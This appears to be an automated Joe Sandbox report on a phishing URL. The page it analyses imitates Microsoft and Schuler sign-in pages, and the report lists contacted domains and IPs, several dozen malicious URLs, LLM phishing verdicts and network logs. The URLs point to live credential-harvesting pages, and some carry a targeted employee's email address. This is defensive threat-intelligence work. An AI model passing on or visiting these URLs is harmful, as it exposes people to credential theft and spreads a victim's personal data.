https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3irk.ativens.com	104.21.90.167	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	unknown
nzd92.6gniu68.ru	188.114.96.3	true	false	unknown
github.com	140.82.121.4	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
itanhangasaude.com.br	162.241.62.33	true	false	unknown
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
ipapi.co	104.26.9.44	true	false	unknown
vkwek.ckyucle.com	188.114.96.3	true	true	unknown
code.jquery.com	151.101.130.137	true	false	unknown
d2vgu95hoyrpkh.cloudfront.net	18.245.31.78	true	false	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	unknown
sni1gl.wpc.upsiloncdn.net	152.199.21.175	true	false	unknown
challenges.cloudflare.com	104.17.3.184	true	false	unknown
www.google.com	142.250.186.164	true	false	unknown
d19d360lklgih4.cloudfront.net	13.33.187.68	true	false	unknown
objects.githubusercontent.com	185.199.109.133	true	false	unknown
httpbin.org	3.227.135.8	true	false	unknown
cdn.socket.io	unknown	unknown	false	unknown
aadcdn.msauthimages.net	unknown	unknown	false	unknown
ok4static.oktacdn.com	unknown	unknown	false	unknown
www.itanhangasaude.com.br	unknown	unknown	false	unknown
206.23.85.13.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX	false	Avira URL Cloud: safe	unknown
https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130	true	Avira URL Cloud: malware	unknown
https://code.jquery.com/jquery-3.6.0.min.js	false	URL Reputation: safe	unknown
https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W	false	Avira URL Cloud: safe	unknown
https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF	false	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	true		unknown
https://vkwek.ckyucle.com/2DUx/	true	Avira URL Cloud: malware	unknown
https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106	true	Avira URL Cloud: malware	unknown
https://s3irk.ativens.com/RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/favicon.ico	true	Avira URL Cloud: malware	unknown
https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	false	URL Reputation: safe	unknown
https://ipapi.co/8.46.123.33/json/	false	Avira URL Cloud: safe	unknown
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69	true	Avira URL Cloud: malware	unknown
https://a.nel.cloudflare.com/report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72	true	Avira URL Cloud: malware	unknown
https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170	true	Avira URL Cloud: malware	unknown
https://httpbin.org/ip	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	true		unknown
https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47	true	Avira URL Cloud: malware	unknown
https://cdn.socket.io/4.6.0/socket.io.min.js	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	true		unknown
https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/xy12R7tzrssHzef25	true	Avira URL Cloud: malware	unknown
https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://developers.google.com/recaptcha/docs/faq#localhost_support	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://support.google.com/recaptcha#6262736	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://support.google.com/recaptcha/?hl=en#6223828	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://cloud.google.com/contact	chromecache_126.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/fent)	chromecache_118.2.dr	false	Avira URL Cloud: safe	unknown
https://support.google.com/recaptcha/#6175971	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/api2/	chromecache_126.2.dr, chromecache_121.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/2DUx/#-	chromecache_123.2.dr	true	Avira URL Cloud: malware	unknown
https://support.google.com/recaptcha	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://cloud.google.com/recaptcha-enterprise/billing-information	chromecache_126.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://recaptcha.net	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://www.apache.org/licenses/	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que	chromecache_126.2.dr	false	URL Reputation: safe	unknown
https://play.google.com/log?format=json&hasfast=true	chromecache_126.2.dr	false	Avira URL Cloud: safe	unknown
https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca	chromecache_126.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
18.245.31.78	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
104.17.3.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
185.199.109.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
151.101.66.137	unknown	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
172.217.18.4	unknown	United States	15169	GOOGLEUS	false
13.33.187.68	d19d360lklgih4.cloudfront.net	United States	16509	AMAZON-02US	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
104.26.9.44	ipapi.co	United States	13335	CLOUDFLARENETUS	false
104.21.90.167	s3irk.ativens.com	United States	13335	CLOUDFLARENETUS	false
3.227.135.8	httpbin.org	United States	14618	AMAZON-AESUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
162.241.62.33	itanhangasaude.com.br	United States	46606	UNIFIEDLAYER-AS-1US	false
188.114.96.3	nzd92.6gniu68.ru	European Union	13335	CLOUDFLARENETUS	true
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
152.199.21.175	sni1gl.wpc.upsiloncdn.net	United States	15133	EDGECASTUS	false
104.17.2.184	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466693
Start date and time:	2024-07-03 09:39:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.phis.win@19/102@36/20
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 64.233.166.84, 142.250.185.174, 142.250.80.35, 34.104.35.123, 40.68.123.157, 192.229.221.95, 199.232.214.172, 20.166.126.56, 13.95.31.18, 93.184.221.240, 13.85.23.206, 40.127.169.103, 13.85.23.86, 172.217.18.106, 172.217.18.10, 172.217.23.106, 142.250.184.234, 172.217.16.138, 142.250.185.74, 216.58.212.138, 142.250.184.202, 216.58.206.74, 172.217.16.202, 142.250.186.170, 142.250.186.138, 142.250.181.234, 142.250.186.106, 142.250.74.202, 142.250.186.42, 216.58.212.131, 142.250.186.67, 199.232.210.172
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Input	Output
URL: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency or interest.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
Title: Fair Value OCR: Microsoft Sign in crystal.begin@schulergrcup.com No ecccunt7 Create one: Can't access your account? Next Sign-in options Terms of use Privacy & cookies
URL: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs Model: Perplexity: mixtral-8x7b-instruct	{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a form that requests sensitive information such as email addresses and passwords.","There is no language in the text that creates a sense of urgency.","There is no CAPTCHA or other anti-robot detection mechanism present on the webpage."]}
Title: Fair Value OCR: SCHULER crystal.begin@schulergroup.com Enter password Enter password to access your office mail. Password Forgot my password Sign in Terms of use Privacy & cookies
URL: https://vkwek.ckyucle.com Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Microsoft", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "microsoft.com", "reasons": "The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social usering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion."}

URL: https://vkwek.ckyucle.com Model: gpt-4o	```json{ "phishing_score": 9, "brands": "Schuler", "phishing": true, "suspicious_domain": true, "has_prominent_loginform": true, "has_captcha": false, "setechniques": true, "has_suspicious_link": true, "legitmate_domain": "schulergroup.com", "reasons": "The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social usering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts."}

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	231
Entropy (8bit):	6.725074433303473
Encrypted:	false
SSDEEP:	6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
MD5:	547988BAC5584B4608466D761E16F370
SHA1:	C11BB71049702528402A31027F200184910A7E23
SHA-256:	70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
SHA-512:	C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
Malicious:	false
Reputation:	low
URL:	https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130
Preview:	.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.\|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 09:40:27.935682058 CEST	53	49575	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:27.935960054 CEST	53	54059	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:27.957304955 CEST	53	53691	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:29.189605951 CEST	53	63695	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:29.845374107 CEST	58499	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:29.845561981 CEST	62071	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:30.173084021 CEST	53	62071	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:30.276032925 CEST	53	58499	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:31.067904949 CEST	54783	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:31.068591118 CEST	61672	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:31.083395004 CEST	53	54783	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:31.105873108 CEST	53	61672	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:32.513986111 CEST	56206	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:32.516879082 CEST	55029	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:32.521222115 CEST	53	56206	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:32.524719000 CEST	53	55029	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:32.525676012 CEST	59569	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:32.525979996 CEST	57728	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:32.538168907 CEST	53	57728	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:32.577826023 CEST	53	59569	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:32.641093969 CEST	55764	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:32.644396067 CEST	61461	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:32.647985935 CEST	53	55764	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:32.651984930 CEST	53	61461	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.422976971 CEST	58786	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.423563957 CEST	55016	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.424324989 CEST	64482	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.424988031 CEST	59533	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.425817013 CEST	63484	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.426264048 CEST	52644	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.428853035 CEST	51297	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.429006100 CEST	65178	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:33.429867983 CEST	53	58786	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.430655956 CEST	53	55016	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.431093931 CEST	53	64482	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.431674004 CEST	53	59533	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.432923079 CEST	53	63484	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.432943106 CEST	53	52644	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.440167904 CEST	53	65178	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:33.482614994 CEST	53	51297	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:35.543534994 CEST	55548	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:35.544054985 CEST	63388	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:35.550637960 CEST	53	55548	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:35.551096916 CEST	53	63388	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:37.108814001 CEST	53096	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:37.109036922 CEST	54464	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:37.115586996 CEST	53	53096	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:37.116875887 CEST	53	54464	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:46.318600893 CEST	53	57551	1.1.1.1	192.168.2.6
Jul 3, 2024 09:40:57.211220026 CEST	53	61406	162.159.36.2	192.168.2.6
Jul 3, 2024 09:40:57.769283056 CEST	61952	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:40:57.781459093 CEST	53	61952	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:00.525572062 CEST	65316	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:00.534182072 CEST	53	65316	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:01.240600109 CEST	64195	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:01.267283916 CEST	53	64195	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:04.872868061 CEST	57537	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:04.873575926 CEST	58863	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:04.874031067 CEST	60969	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:04.877537012 CEST	64395	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:04.879096031 CEST	64777	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:04.881949902 CEST	53	57537	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:04.881962061 CEST	53	58863	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:04.881970882 CEST	53	60969	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:04.886940956 CEST	53	64777	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:04.899657011 CEST	53	64395	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:05.814009905 CEST	54929	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:05.821000099 CEST	53	54929	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:08.677069902 CEST	50458	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:08.685153961 CEST	53	50458	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:09.489459038 CEST	51211	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:09.497319937 CEST	53	51211	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:10.304713964 CEST	55312	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:10.342035055 CEST	53	55312	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:11.953528881 CEST	54777	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:32.639755964 CEST	56236	53	192.168.2.6	1.1.1.1
Jul 3, 2024 09:41:32.857125044 CEST	53	56236	1.1.1.1	192.168.2.6
Jul 3, 2024 09:41:52.556298971 CEST	53	53648	1.1.1.1	192.168.2.6

Timestamp	Bytes transferred	Direction	Data
2024-07-03 07:40:16 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 75 61 63 5a 4d 68 49 6c 6b 65 47 78 63 50 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 31 61 34 66 39 63 33 63 33 32 33 37 65 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: cuacZMhIlkeGxcPu.1Context: ec1a4f9c3c3237e9
2024-07-03 07:40:16 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
